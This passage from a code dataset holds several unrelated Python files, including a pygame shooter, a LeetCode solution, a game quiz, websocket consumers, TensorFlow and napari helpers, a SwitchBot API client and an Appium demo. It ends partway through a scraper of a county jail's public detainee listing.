(60, 350))\n        \n\n        pygame.display.flip()\n\n    def run(self):\n        while self.running:\n            self.handling_event()\n            self.text()\n            self.display()\n\n            if self.run_game == True:\n                self.update()\n\n            self.clock.tick(60)\n            if self.run_game:\n                # count elapsed frames; at 60 FPS, seconds / 60 is the survival time\n                self.seconds += 1\n\npygame.init()\nwindow_icon = pygame.image.load('Astreroïd_2.png')\n\nsurface = pygame.display.set_mode((SCREEN_HEIGHT, SCREEN_WIDTH))\npygame.display.set_caption('SpaceShooter')\npygame.display.set_icon(window_icon)\nsurface.fill(BLACK)\npygame.display.flip()\nlaunch = Game(surface)\nlaunch.run()\n\npygame.quit()","repo_name":"ImKarasu/SpaceShooter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"20816797193","text":"\nimport collections\nfrom typing import List,Optional\nimport copy\n\n# Definition for singly-linked list.\nclass ListNode:\n    def __init__(self, val=0, next=None):\n        self.val = val\n        self.next = next\nclass Solution:\n    # dummy-head (front-insertion) method\n    # segment-reversal method\n    def reverseBetween(self, head: ListNode, left: int, right: int) -> ListNode:\n        if left==right:\n            return head\n        dummyhead=ListNode(0,head)\n        cur=head\n        pre=dummyhead\n        i=1\n        while cur:\n            if i==left:\n                end=cur\n                begin=cur.next\n                cur1=cur.next\n                cur2=cur.next.next\n                for i in range(right-left):\n                    cur1.next=cur\n                    begin=cur1\n                    \n                    cur=cur1\n                    cur1=cur2\n                    if cur2:\n                        cur2=cur2.next\n                    \n                pre.next=begin\n                end.next=cur1\n                return dummyhead.next\n            i+=1\n            pre=cur\n            cur=cur.next\n        return dummyhead.next\n\nsol=Solution()\nnode1=ListNode(5,None)\nnode2=ListNode(4,node1)\nnode3=ListNode(3,node2)\nnode4=ListNode(2,node3)\nnode5=ListNode(1,node4)\n\nnodenow=sol.reverseBetween(node5,2,4)\nwhile nodenow:\n    
print(nodenow.val)\n    nodenow=nodenow.next","repo_name":"Reigo666/Leetcode","sub_path":"Reigo/leetcode/Python/92. 反转链表 II.py","file_name":"92. 反转链表 II.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40580517868","text":"def allianceOptions():\n    print(\"You belong to the Alliance\\n\"\n          \"A humble group of courageous heroes poised to protect Azeroth\\n\"\n          \"From those who want to destroy it\")\n    print(\"The next round of questions\\nWill deal with what type of race you are\\n\")\n    print(\"There are 13 different races in total\\n\"\n          \"7 in Alliance and 7 in Horde\\n\"\n          \"one race can be played in either Horde or Alliance\\n\"\n          \"for Alliance there is Human, Dwarf, Night Elf, Gnome, Draenei and Worgen \\n\"\n          \"and the Pandaren which is the one race that can be played on both sides.\\n\"\n          \"In the Horde there is Orc, Undead, Tauren, Troll, Blood Elf and Goblin\\n\"\n          \"as well as the Pandaren again.\")\n    print(\"Each race has a certain number of classes they can choose from that vary from race to race\\n\"\n          \"but we will get into that later.\\n\"\n          \"Since there are so many races there will be ten questions asked in this round.\\n\")\n    print(\"So let's get started!!!\\n\\n\")\n\n    race = ['NightElf', 'Dwarf', 'Human', 'Gnome', 'Draenei', 'Worgen', 'Pandaren']\n    count = [0, 0, 0, 0, 0, 0, 0]\n\n    print(\"Are you more of: A. A person who enjoys being outside or B. A person who enjoys spending the day inside ?\")\n    answer1 = input()\n    while answer1 not in ('A', 'B'):\n        print(\"Error, please enter A or B.\", end=\"\")\n        answer1 = input()\n    if answer1 == \"A\":\n        count[0] += 1\n    elif answer1 == \"B\":\n        count[1] += 1\n    print(\"Do you A. Enjoy being in the dark or B. Enjoy being in the wilderness ?\")\n    answer2 = input()\n    while answer2 not in ('A', 'B'):\n        print(\"Error, please enter A or B.\", end=\"\")\n        answer2 = input()\n    if answer2 == \"A\":\n        count[2] += 1\n    elif answer2 == \"B\":\n        count[3] += 1\n    print(\"Are you someone who A. Sees the light as a source of pureness and power or B. Someone who prefers the \"\n          \"shadows ?\")\n    answer3 = input()\n    while answer3 not in ('A', 'B'):\n        print(\"Error, please enter A or B.\", end=\"\")\n        answer3 = input()\n    if answer3 == \"A\":\n        count[4] += 1\n    elif answer3 == \"B\":\n        count[5] += 1\n    print(\"Are you A. Tranquil and calm minded or B. Headstrong and strong minded ?\")\n    answer4 = input()\n    while answer4 not in ('A', 'B'):\n        print(\"Error, please enter A or B.\", end=\"\")\n        answer4 = input()\n    if answer4 == \"A\":\n        count[6] += 1\n    elif answer4 == \"B\":\n        count[0] += 1\n    print(\"Do you enjoy A. building things or B. fixing things ?\")\n    answer5 = input()\n    while answer5 not in ('A', 'B'):\n        print(\"Error, please enter A or B.\", end=\"\")\n        answer5 = input()\n    if answer5 == \"A\":\n        count[1] += 1\n    elif answer5 == \"B\":\n        count[2] += 1\n    print(\"Would you be more inclined to A. Harness the power of the land or B. Harness the power of gems ?\")\n    answer6 = input()\n    while answer6 not in ('A', 'B'):\n        print(\"Error, please enter A or B.\", end=\"\")\n        answer6 = input()\n    if answer6 == \"A\":\n        count[3] += 1\n    elif answer6 == \"B\":\n        count[4] += 1\n    print(\"Are you the type of person to A. Embrace a family or B. 
embrace solitude ?\")\n    answer7 = input()\n    while answer7 not in ('A', 'B'):\n        print(\"Error, please enter A or B.\", end=\"\")\n        answer7 = input()\n    if answer7 == \"A\":\n        count[5] += 1\n    elif answer7 == \"B\":\n        count[6] += 1\n    print(\"You have most in common with the\", race[count.index(max(count))])\n\n\n","repo_name":"x4v13r1120/WoWCompabilityTest","sub_path":"alliance.py","file_name":"alliance.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11266264305","text":"from mautrix.util.async_db import UpgradeTable\n\nupgrade_table = UpgradeTable()\n\nfrom . import (\n    v01_initial_revision,\n    v02_message_oti,\n    v03_portal_meta_set,\n    v04_relay_mode,\n    v05_remove_communities,\n    v06_store_user_seq_id,\n    v07_store_reaction_timestamp,\n    v08_backfill_queue,\n    v09_portal_infinite_backfill,\n    v10_user_thread_sync_status,\n    v11_user_thread_sync_done_flag,\n    v12_puppet_contact_info_set,\n)\n","repo_name":"mautrix/facebook","sub_path":"mautrix_facebook/db/upgrade/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":365,"dataset":"github-code","pt":"40"} +{"seq_id":"33146449856","text":"import json\n\nfrom channels.generic.websocket import AsyncWebsocketConsumer\nimport asyncio\nfrom . import kpi_websocket\nimport schedule\nimport time\nfrom asgiref.sync import sync_to_async\n\nclass ChatConsumer(AsyncWebsocketConsumer):\n    async def connect(self):\n        # Add the consumer to the \"chat\" channel group\n        # print(self.scope[\"user\"])\n        # print('paramsssssssssssss',self.scope[\"headers\"])\n        # print('scope', self.scope)\n        # print('qery_stringggg', self.scope['query_string'].decode())\n        query_string=self.scope['query_string'].decode()\n        machine_id = query_string.split('=')[1]\n        print('machine_id connect ',machine_id)\n\n\n\n        # paramsssssssssssss [(b'sec-websocket-version', b'13'), (b'sec-websocket-key', b'PID+IdLq/ts0PQ8qVc2xUQ=='), (b'connection', b'Upgrade'), (b'upgrade', b'websocket'),\n        # (b'sec-websocket-extensions', b'permessage-deflate; client_max_window_bits'), (b'host', b'127.0.0.1:8000')]\n\n        await self.channel_layer.group_add(str(machine_id)+'_io', self.channel_name)\n        # group_name=self.scope[\"url_route\"][\"kwargs\"][\"group_name\"]\n        # print('group_name',group_name)\n        await self.accept()\n\n\n    async def disconnect(self, close_code):\n        query_string = self.scope['query_string'].decode()\n        machine_id = query_string.split('=')[1]\n        print('idddddddddddddddddddddddd',machine_id)\n        await self.channel_layer.group_discard(str(machine_id)+'_io', self.channel_name)\n\n        # Remove the consumer from the \"chat\" channel group\n        # await self.channel_layer.group_discard(\"mqtt_data\", self.channel_name)\n\n\n    async def receive(self, text_data):\n        print('text',text_data)\n        print('receiver ........scope', self.scope)\n\n\n        # Send the processed data to the connected WebSocket clients\n        await self.channel_layer.group_send(\"mqtt_data\", {\n            \"type\": \"chat.message\",\n            \"text\": text_data # Send the processed data as the message\n        })\n        # print('receive text_data',text_data)\n        # await asyncio.sleep(5)\n\n    async def chat_message(self, event):\n        # print('ppppppp',self.scope.get('machine_id'))\n        # print('selff',self)\n        # # selff \n        # print('scope',self.scope)\n        # print('qery_stringggg',self.scope['query_string'].decode())\n        print('event' , event)\n        print('event text' , event[\"text\"])\n\n        try:\n            # Send the received 
data to the WebSocket connection\n await self.send(text_data=event[\"text\"])\n print(\"eventtttttttttttttttttttttttttt\")\n # await self.send(text_data=json.dumps(event[\"text\"]))\n await asyncio.sleep(1)\n except Exception as e:\n print(\"chat message error - \", e)\n\n#\n# # @sync_to_async\n# def test(self):\n# # machine_id = 'MI'\n# print('task function')\n#\n#\n# class myscheduler:\n# def __init__(self,machine):\n# self.machine_id=machine\n# print(self.machine_id)\n# # Initialize any class-specific variables here\n# # self.counter = 0\n# pass\n#\n# async def my_task(self):\n# await kpi_websocket.kpi_socket(self.machine_id)\n# # await kpi_websocket.kpi_socket(self.machine_id)\n# # loop = asyncio.new_event_loop()\n# # asyncio.set_event_loop(loop)\n# # loop.run_until_complete(kpi_websocket.kpi_socket(self.machine_id))\n#\n#\n# def start_scheduling(self):\n# # Schedule my_task to run every 2 seconds\n# schedule.every(2).seconds.do(self.my_task)\n#\n# while True:\n# schedule.run_pending()\n# time.sleep(1)\n#\n\n\nclass KpiConsumer(AsyncWebsocketConsumer):\n\n async def connect(self):\n try:\n query_string = self.scope['query_string'].decode()\n machine_id = query_string.split('=')[1]\n # if not machine_id:\n # await self.close()\n # return\n await self.channel_layer.group_add(str(machine_id)+'_kpi', self.channel_name)\n\n await self.accept()\n\n # Start calling kpi_socket function periodically\n self.machine_id = machine_id\n self.scheduler_task = asyncio.create_task(self.schedule_kpi_socket())\n except:\n print(\"errorrrrr\")\n\n async def disconnect(self, close_code):\n # Cancel the scheduler task when disconnecting\n if hasattr(self, 'scheduler_task'):# hasattr() function is an inbuilt utility function,\\\n # which is used to check if an object has the given named attribute and return true if present, else false.\n self.scheduler_task.cancel()\n\n await self.channel_layer.group_discard(str(self.machine_id)+'_kpi', self.channel_name)\n\n async def schedule_kpi_socket(self):\n while True:\n try:\n print(\"-----------------------------------------------\")\n print(\"-----------------------------------------------\")\n await kpi_websocket.kpi_socket(self.machine_id)\n # Adjust the sleep duration as needed (e.g., call every 10 seconds)\n await asyncio.sleep(2)\n except asyncio.CancelledError:\n # Task was canceled due to disconnection\n break\n\n async def kpiweb(self, event):\n try:\n await self.send(text_data=event[\"text\"])\n except Exception as e:\n print(\"kpi message error - \", e)\n\n","repo_name":"kavya-automac/Automac_project","sub_path":"Automac_main/Automac_machines_app/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":5533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37821874364","text":"import tensorflow as tf\n\n\ndef _parse_example(example_proto):\n feature_description = {\n \"font\": tf.io.FixedLenFeature([], tf.string, default_value=\"\")\n }\n\n parsed = tf.io.parse_example(example_proto, feature_description)\n tensor = tf.io.parse_tensor(parsed[\"font\"], tf.float32)\n tensor = tf.reshape(tensor, (52, -1, 2))\n\n return {\"font\": tensor}\n\n\ndef get_dataset(path):\n raw_dataset = tf.data.TFRecordDataset(path)\n dataset = raw_dataset.map(\n _parse_example, num_parallel_calls=tf.data.experimental.AUTOTUNE\n )\n return dataset\n\n\ndef get_batches(dataset, BATCH_SIZE=32, BUFFER_SIZE=10_000):\n dataset = dataset.shuffle(buffer_size=BUFFER_SIZE)\n batches = dataset.batch(BATCH_SIZE, 
drop_remainder=True).prefetch(\n tf.data.experimental.AUTOTUNE\n )\n return batches\n","repo_name":"mzguntalan/h-former","sub_path":"data/data_loading.py","file_name":"data_loading.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"10965183450","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport napari\nimport dask.array as da\n\n\ndef blended_img(\n viewer,\n index=(Ellipsis),\n contrast_limits=None,\n):\n \"\"\"Creates blended image\n\n Args:\n viewer (napari viewer object]): [description]\n index (tuple, optional): [description]. Defaults to (Ellipsis).\n contrast_limits: Defaults to None and uses viewer contrast limits.\n If tuple passed, uses this for percentage contrast limits. If list passed, set contrast limits from list.\n\n Returns:\n colormapped_list: list of RGB images\n clims_used: list of contrast limits used\n \"\"\"\n blended = np.zeros(viewer.layers[0].data[index].shape + (4,))\n colormapped_list = list()\n clims_used = list()\n for i, layer in enumerate(viewer.layers):\n img = layer.data[index]\n if isinstance(img, da.core.Array):\n img = img.compute()\n\n # normalize data by clims\n if contrast_limits is None:\n lower_clim = layer.contrast_limits[0]\n upper_clim = layer.contrast_limits[1]\n normalized_data = (img - lower_clim) / (upper_clim - lower_clim)\n\n if isinstance(contrast_limits, tuple):\n if img.max() == 0:\n normalized_data = img\n else:\n lower_clim = np.percentile(img.ravel(), contrast_limits[0])\n upper_clim = np.percentile(img.ravel(), contrast_limits[1])\n normalized_data = (img - lower_clim) / (upper_clim - lower_clim)\n\n if isinstance(contrast_limits, list):\n lower_clim = contrast_limits[i][0]\n upper_clim = contrast_limits[i][1]\n normalized_data = (img - lower_clim) / (upper_clim - lower_clim)\n\n clims_used.append((lower_clim, upper_clim))\n colormapped_data = layer.colormap.map(normalized_data.flatten())\n colormapped_data = colormapped_data.reshape(normalized_data.shape + (4,))\n colormapped_list.append(colormapped_data)\n blended = blended + colormapped_data\n\n blended[..., 3] = 1\n\n colormapped_list.append(blended)\n return colormapped_list, clims_used\n\n\ndef create_matplotlib_figure_4i_over_days_of_stainings(\n viewer, image_titles, row_titles, index, defined_clims=None, **kwargs\n):\n title_list = [title + (\"composite\",) for title in image_titles]\n days_of_stainings = viewer.layers[0].data.shape[0]\n\n fig, ax = plt.subplots(\n nrows=days_of_stainings, ncols=len(viewer.layers) + 1, figsize=(8, 12)\n )\n clim_list = list()\n\n for day in range(days_of_stainings):\n if defined_clims is None:\n img_list, clims = blended_img(viewer, (day,) + index, **kwargs)\n else:\n img_list, clims = blended_img(\n viewer, (day,) + index, contrast_limits=defined_clims[day], **kwargs\n )\n clim_list.append(clims)\n\n for i, img in enumerate(img_list):\n ax[day, i].imshow(img)\n ax[day, i].xaxis.set_visible(False)\n plt.setp(ax[day, i].spines.values(), visible=False)\n ax[day, i].tick_params(left=False, labelleft=False)\n if i == 0:\n ax[day, i].set_ylabel(f\"{row_titles[day]}\")\n ax[day, i].yaxis.label.set_color(\"white\")\n ax[day, i].set_title(title_list[day][i])\n\n return fig, ax, clim_list\n\n\ndef plot_img_lists(img_list, title_list, channel_list, figsize=(8, 12)):\n fig, ax = plt.subplots(nrows=len(img_list), ncols=len(img_list[0]), figsize=figsize)\n\n for i, (img_channels, title) in enumerate(zip(img_list, title_list)):\n for 
ii, (img, channel) in enumerate(zip(img_channels, channel_list)):\n ax[i, ii].imshow(img)\n ax[i, ii].xaxis.set_visible(False)\n plt.setp(ax[i, ii].spines.values(), visible=False)\n ax[i, ii].tick_params(left=False, labelleft=False)\n if i == 0:\n ax[i, ii].set_title(channel)\n if ii == 0:\n ax[i, ii].set_ylabel(title)\n ax[i, ii].yaxis.label.set_color(\"black\")\n\n plt.subplots_adjust(hspace=0.2, wspace=0.01)\n\n return fig, ax\n","repo_name":"morriso1/scanR_analysis","sub_path":"mpl_figs/mpl_figs.py","file_name":"mpl_figs.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3082751680","text":"\"\"\"\nFile : main.py\nAuthor : Victor Hertel\nDate : 20.07.2018\n\nGraphical User Interface of the Application\n\"\"\"\n\n\n\n# imports\nfrom GUI import SystemPage, OrbitPage, OrbitFamilyPage\nimport matplotlib\nmatplotlib.use(\"TkAgg\")\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg\nfrom matplotlib.figure import Figure\nfrom tkinter import *\nfrom tkinter import filedialog, ttk\nfrom Utility import Utility, System, Plot, NumericalMethods\nfrom Orbit import Orbit, InitialGuess\nfrom OrbitFamily import OrbitFamily\nimport numpy as np\nfrom scipy.integrate import odeint\nimport matplotlib as mpl\nfrom PIL import ImageTk, Image\nmpl.use('TkAgg')\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport time\nimport os\n\n# global variables\nLARGE_FONT = (\"Verdana\", 12)\n\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# This method contains the start page.\n# ----------------------------------------------------------------------------------------------------------------------\nclass StartPage(Frame):\n # ------------------------------------------------------------------------------------------------------------------\n # The GUI structure is loaded during initialization.\n # ------------------------------------------------------------------------------------------------------------------\n def __init__(self, parent, controller):\n Frame.__init__(self, parent)\n # main frame\n frameStartPage = Frame(self)\n frameStartPage.pack(expand=True, fill=BOTH, padx=10, pady=10)\n # button for creating new instance of orbit or orbit family\n instanceButton = Button(frameStartPage, text=\"Create New Instance\", command=lambda: StartPage.createNewInstance(self, parent, controller))\n instanceButton.grid(row=0, column=0, sticky='W', padx=5, pady=2)\n # button for creating new instance by loading data\n loadButton = Button(frameStartPage, text=\"Load From Data\", command=lambda: StartPage.loadFromData(self, parent, controller))\n loadButton.grid(row=0, column=1, sticky='E', padx=5, pady=2)\n # button to quit program\n quitButton = Button(frameStartPage, text=\"Exit\", command=self.client_exit)\n quitButton.grid(row=1, column=0, sticky='W', padx=5, pady=2)\n # ------------------------------------------------------------------------------------------------------------------\n # This method is called when the user wants to instantiate a new object.\n # ------------------------------------------------------------------------------------------------------------------\n def createNewInstance(self, parent, controller):\n controller.frames[\"SystemPage\"] = SystemPage.SystemPage(parent=parent, controller=controller)\n controller.frames[\"SystemPage\"].grid(row=0, column=0, 
sticky=\"nsew\")\n        controller.show_frame(\"SystemPage\")\n    # ------------------------------------------------------------------------------------------------------------------\n    # This method is called when the user wants to load input data from a file.\n    # ------------------------------------------------------------------------------------------------------------------\n    def loadFromData(self, parent, controller):\n        defaultPath = os.path.dirname(os.path.abspath(__file__)) + \"/Output/\"\n        filePath = filedialog.askopenfilename(initialdir=defaultPath, title=\"Select file\", filetypes=((\"txt files\", \"*.txt\"), (\"all files\", \"*.*\")))\n        file = open(filePath, \"r\")\n        words = []\n        type = None\n        nameFP = None\n        massFP = None\n        nameSP = None\n        massSP = None\n        distance = None\n        lagrangian = None\n        orbitNumber = None\n        orbitDistance = None\n        for lines in file:\n            line = lines.split()\n            if \"TYPE\" in lines:\n                type = line[2]\n            if \"NAME FIRST PRIMARY\" in lines:\n                nameFP = line[4]\n            if \"MASS FIRST PRIMARY\" in lines:\n                massFP = float(line[4])\n            if \"NAME SECOND PRIMARY\" in lines:\n                nameSP = line[4]\n            if \"MASS SECOND PRIMARY\" in lines:\n                massSP = float(line[4])\n            if \"PRIMARY DISTANCE\" in lines:\n                distance = float(line[3])\n            if \"LAGRANGIAN\" in lines:\n                lagrangian = line[2]\n            if \"ORBIT NUMBER\" in lines:\n                orbitNumber = int(line[3])\n            if \"ORBIT DISTANCE\" in lines:\n                orbitDistance = float(line[3])\n            # if \"DATA_START\" in lines:\n            #     for i in range(2):\n            #         line = file.readline()\n            #         words = line.split()\n\n            if \"DATA_START\" in lines:\n                for i in range(2):\n                    line = file.readline()\n                    words = line.split()\n                x0 = np.array([float(words[2]), 0, float(words[3]), 0, float(words[4]), 0])\n                for i in range(3):\n                    words.insert(2 * i + 3, 0)\n                data = words\n                while \"DATA_STOP\" not in line:\n                    words = line.split()\n                    for i in range(3):\n                        words.insert(2 * i + 3, 0)\n                    data = np.vstack([data, words])\n                    line = file.readline()\n                data = data.astype(float)  # np.float was removed from NumPy; the builtin float is equivalent\n        file.close()\n        dynamicalSystem = System(nameFP, massFP, nameSP, massSP, distance)\n\n        if type == \"ORBIT\":\n            orbit = Orbit(x0, \"x\", dynamicalSystem)\n            controller.frames[\"OrbitPage\"] = OrbitPage.OrbitPage(parent=parent, controller=controller, orbit=orbit, dynamicalSystem=dynamicalSystem)\n            controller.frames[\"OrbitPage\"].grid(row=0, column=0, sticky=\"nsew\")\n            controller.show_frame(\"OrbitPage\")\n        elif type == \"FAMILY\":\n            if data[0,4] > data[-1,4]:\n                direction = \"Northern\"\n            else:\n                direction = \"Southern\"\n            orbitFamily = OrbitFamily(x0, direction, lagrangian, orbitDistance, dynamicalSystem, familyData=data)\n            controller.frames[\"OrbitFamilyPage\"] = OrbitFamilyPage.OrbitFamilyPage(parent=parent, controller=controller, orbitFamily=orbitFamily, dynamicalSystem=dynamicalSystem)\n            controller.frames[\"OrbitFamilyPage\"].grid(row=0, column=0, sticky=\"nsew\")\n            controller.show_frame(\"OrbitFamilyPage\")\n    # ------------------------------------------------------------------------------------------------------------------\n    # This method terminates the program.\n    # ------------------------------------------------------------------------------------------------------------------\n    def client_exit(self):\n        exit()\n","repo_name":"vhertel/halo-orbit-analysis-tool","sub_path":"GUI/StartPage.py","file_name":"StartPage.py","file_ext":"py","file_size_in_byte":6743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7974320248","text":"import base64\nimport hashlib\nimport hmac\nimport json\nimport sys\nimport time\nimport uuid\n\nimport requests\n\n\nclass 
Switchbot:\n    \"\"\"Switchbot Utility class\"\"\"\n\n    def __init__(self):\n        \"\"\"Constructor\"\"\"\n        pass\n\n    def read_token(self) -> tuple:\n        \"\"\"Import access token and secret from settings.json\"\"\"\n        try:\n            with open(\"settings.json\", \"r\") as f:\n                settings = json.load(f)\n            token = settings[\"token\"]\n            secret = settings[\"secret\"]\n            return token, secret\n        except FileNotFoundError:\n            sys.exit(\"settings.json file does not exist\")\n        except KeyError:\n            sys.exit(\"settings.json file is invalid\")\n\n    def gen_sign(self) -> dict:\n        \"\"\"Generate Switchbot API v1.1 sign header\n\n        Returns:\n            Switchbot API v1.1 sign header\n        \"\"\"\n\n        token, secret = self.read_token()\n\n        nonce = str(uuid.uuid4())\n        t = int(round(time.time() * 1000))\n        string_to_sign = \"{}{}{}\".format(token, t, nonce)\n\n        string_to_sign = bytes(string_to_sign, \"utf-8\")\n        secret = bytes(secret, \"utf-8\")\n\n        hmacstr = hmac.new(\n            secret, msg=string_to_sign, digestmod=hashlib.sha256\n        ).digest()\n        sign = base64.b64encode(hmacstr)\n\n        header = {}\n        header[\"Authorization\"] = token\n        header[\"sign\"] = str(sign, \"utf-8\")\n        header[\"t\"] = str(t)\n        header[\"nonce\"] = nonce\n\n        return header\n\n    def devicelist(self) -> None:\n        \"\"\"Create all Switchbot device list as deviceList.txt\"\"\"\n        header = self.gen_sign()\n        response = requests.get(\n            \"https://api.switch-bot.com/v1.1/devices\", headers=header\n        )\n        devices = json.loads(response.text)\n\n        with open(\"deviceList.txt\", \"w\", encoding=\"utf-8\", newline=\"\\\\n\") as f:\n            try:\n                for device in devices[\"body\"][\"deviceList\"]:\n                    f.write(device[\"deviceId\"] + \", \")\n                    f.write(device[\"deviceName\"] + \", \")\n                    f.write(device[\"deviceType\"] + \", \")\n                    f.write(device[\"hubDeviceId\"] + \"\\\\n\")\n\n                for device in devices[\"body\"][\"infraredRemoteList\"]:\n                    f.write(device[\"deviceId\"] + \", \")\n                    f.write(device[\"deviceName\"] + \", \")\n                    f.write(device[\"remoteType\"] + \", \")\n                    f.write(device[\"hubDeviceId\"] + \"\\\\n\")\n            except KeyError:\n                sys.exit(\"Something went wrong\")\n\n    def get_scene_list(self) -> None:\n        \"\"\"Get scene List as sceneList.txt\"\"\"\n        header = self.gen_sign()\n        response = requests.get(\n            \"https://api.switch-bot.com/v1.1/scenes\", headers=header\n        )\n        scenes = json.loads(response.text)\n\n        if scenes[\"message\"] != \"success\":\n            sys.exit(scenes[\"message\"])\n        else:\n            with open(\n                \"sceneList.txt\", \"w\", encoding=\"utf-8\", newline=\"\\\\n\"\n            ) as f:\n                for scene in scenes[\"body\"]:\n                    f.write(scene[\"sceneId\"] + \", \")\n                    f.write(scene[\"sceneName\"] + \"\\\\n\")\n\n    def scene_execute(self, sceneId: str) -> str:\n        \"\"\"Execute scene\"\"\"\n        header = self.gen_sign()\n        url = \"https://api.switch-bot.com/v1.1/scenes/\" + sceneId + \"/execute\"\n        response = requests.post(url=url, headers=header)\n        return response.text\n","repo_name":"iCarrot0605/Switchbot_utility","sub_path":"src/switchbot_utility/switchbot.py","file_name":"switchbot.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41660348339","text":"import time\n\nfrom appium import webdriver\n\n_appPackage = 'com.xueqiu.android'\n_appActivity = '.view.WelcomeActivityAlias'\n\ncaps = {}\n# caps['uuid']='127.0.0.1:62001'# device uuid\ncaps['platformName'] = 'Android'\ncaps['platformVersion'] = '7.1.2'\ncaps['deviceName'] = '127.0.0.1:62001'\ncaps['appPackage'] = _appPackage\ncaps['appActivity'] = _appActivity\ncaps['noReset'] = True\ndriver = webdriver.Remote(\"http://127.0.0.1:4723/wd/hub\", caps)\ndriver.implicitly_wait(30)\n# Close the app; usually used together with launch_app\ndriver.close_app()\n# Check whether the app is installed\nprint(driver.is_app_installed(_appPackage))# check if installed\n#print(driver.is_app_installed(_appPackage)) check if installed\n# Install the app (uninstalls first if already present)\ndriver.install_app(\"C:\\\\Users\\\\刘朋强\\\\Desktop\\\\xueqiu.apk\")\n#driver.install_app(\"C:\\\\Users\\\\刘朋强\\\\Desktop\\\\xueqiu.apk\") takes a file path\ntime.sleep(3)\n# Open the activity\ndriver.start_activity(_appPackage,_appActivity)\ntime.sleep(2)\n# Put the app in the background\ndriver.background_app(5)\ntime.sleep(2)\n# Reset the app\ndriver.reset()\n# Press a key by its Android keycode (requires an argument, e.g. 4 = BACK)\n#driver.press_keycode(4)\n# Gesture operations: drag, swipe, long press\nfrom appium.webdriver.common.touch_action import TouchAction\n#TouchAction(driver): instantiates the touch-action helper\n# press() takes an element or a coordinate [x,y], not both; release() ends the press, perform() executes it\n#TouchAction(driver).press(element or x,y).release().perform()\n# Long press: perform first, then release\n#TouchAction(driver).long_press(element).perform().release()\n# Tap; note the syntax [(x,y)]: 1) the built-in tap function, 2) the TouchAction class\ndriver.tap([(100,200)])\n#TouchAction(driver).tap(element).perform().release()\n# Pause, in milliseconds\nTouchAction(driver).wait(2000)\n# Move to; element is the target element\n#TouchAction(driver).move_to(element)\n# Long press then move to (needs a start and an end target)\n#TouchAction(driver).long_press(start_element).move_to(end_element).perform().release()\n# Swipe\n#driver.swipe(x1,y1,x2,y2,duration)\n# Hide the keyboard\ndriver.hide_keyboard()\n# Shake the device\ndriver.shake()\n# Scroll from element a to element b\n#driver.scroll(a_element,b_element) using elements\n#driver.flick(x1,y1,x2,y2)# using coordinates\n# Pinch / zoom\nfrom appium.webdriver.common.multi_action import MultiAction\n# Get the screen size\nx=driver.get_window_size()[\"width\"]\ny=driver.get_window_size()[\"height\"]\ndriver.swipe(int(0.8*x),int(0.5*y),int(0.1*x),int(0.2*y),2000)\n# Network connection type\ndriver.set_network_connection(4)\n# Open the notification bar\ndriver.open_notifications()\n# Set the GPS location\ndriver.set_location(latitude=12,longitude=20,altitude=None)\n# is_enabled: editable, is_selected: selected, is_displayed: visible (all need a located element)\n#driver.find_element(MobileBy.ID, 'element_id').is_displayed()\n#assert driver.find_element(MobileBy.ID, 'element_id').is_enabled()==False\n# Element locating\nfrom appium.webdriver.common.mobileby import MobileBy\n# Switch context (e.g. between native app and webview)\ndriver.switch_to.context(\"context_name\")","repo_name":"Jinghua123456/yueying","sub_path":"pythonProject/xueqiuAutoTeat/case/Api.py","file_name":"Api.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35556404784","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom bs4 import BeautifulSoup\nfrom datetime import timedelta\nimport requests\nimport requests_cache\nfrom time import sleep\nfrom models import detainee_info, charge\nfrom peewee import DoesNotExist\nfrom urllib.parse import parse_qs, urlparse\n\n\nrequests_cache.install_cache(\n\t'cache',\n\texpire_after=timedelta(hours=24),\n\tallowable_methods=('GET',)\n)\n\nurl = 'https://report.boonecountymo.org/mrcjava/servlet/RMS01_MP.R00040s?run=2&R001=&R002=&ID=3641&hover_redir=&width=950'\n\nr = requests.get(url, headers={'user-agent': \"I'm good people!!!\"})\n\nsoup = BeautifulSoup(r.content, \"lxml\")\n\n\ndivs = soup.find_all('div', class_='mugshotDiv')\n\t\n\n\n\n#all IDs (keys)\n\ndef get_detainee_ids(div):\n\n\tdetainee_ID = div.attrs['id'].lstrip('mugshot')\n\n\treturn detainee_ID\n\n\n#for all names\ndef get_detainee_names(div):\n\tname = div.find('div', class_=\"inmateName\").text.strip()\n\treturn name\n\n\n#create detainee info table\n\ndef create_info_table(div):\n\tdetainee_ID = div.get('id').lstrip('mugshot')\n\tdetainee_name = div.find('div', class_=\"inmateName\").text.strip()\n\n\tinfo_table = div.find('table', class_=\"collapse centered_table shadow\")\n\t\n\ttrs = info_table.find_all('tr')\n\t\n\t#data is a dictionary\n\tdata = 
